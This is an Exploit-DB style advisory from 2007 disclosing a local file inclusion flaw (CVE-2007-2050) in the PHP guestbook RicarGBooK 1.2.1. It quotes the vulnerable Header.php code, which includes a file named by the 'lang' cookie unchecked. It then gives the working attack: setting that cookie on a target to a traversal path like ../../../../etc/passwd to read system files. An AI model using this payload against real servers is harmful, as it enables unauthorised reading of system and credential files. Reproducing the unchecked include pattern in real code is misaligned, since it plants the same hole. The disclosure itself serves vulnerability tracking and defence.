RicarGBooK 1.2.1 - 'lang' Local File Inclusion

Author: Dj7xpl
type: webapps
platform: php
port: 
date_added: 2007-04-11 
date_updated: 2016-11-14 
verified: 1 
codes: OSVDB-34909;CVE-2007-2050 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comricargbook_1_2_1.zip

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                       RicarGBooK 1.2.1

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Author :

            Dj7xpl / Dj7xpl[at]Yahoo[dot]com

* Type :

            Local File Inclusion Vulnerabilitiy By Cookie

* Download :

            http://ricargbook.adrielmedia.com

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Vuln Code :       -=-= Header.php =-=-


if (isset($HTTP_COOKIE_VARS["lang"])) {
	$guest_lang = $HTTP_COOKIE_VARS["lang"];
	include ('languages/'.$guest_lang);
} else {
	$guest_lang = $language;
	include ('languages/'.$language);

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Vuln And Example Picture :

            Edit Cookie :

            Server :  http://[Target]
	    Name   :  lang
	    Value  :  Local File      E.g   :  ../../../../etc/passwd


	    [X] http://dj7xpl.by.ru/r1.jpg
	    [X] http://dj7xpl.by.ru/r2.jpg

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

# Sp Tnx : str0ke

# milw0rm.com [2007-04-12]